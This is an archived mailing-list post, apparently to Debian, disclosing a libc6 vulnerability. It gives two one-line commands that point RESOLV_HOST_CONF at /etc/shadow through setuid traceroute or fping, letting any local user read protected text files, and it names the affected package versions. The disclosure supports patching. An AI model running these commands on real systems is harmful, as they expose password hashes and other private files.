[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

libc6 vulnerability


When checking the security of my system, I found that it is vulnerable
to the following standard attack (in tcsh syntax):

	env RESOLV_HOST_CONF=/etc/shadow /usr/sbin/traceroute foobar
  or	env RESOLV_HOST_CONF=/etc/shadow fping foobar

This allows the user to read any (text) file on the system.  My system

	netstd	3.07-7.1
	libc6	2.0.105-1.2

In other words, it is up to date according to ftp.debian.org.

Curiously, my older 486 system at home is not vulnerable to these attacks.

--Paul Vojta, vojta@math.berkeley.edu

Reply to: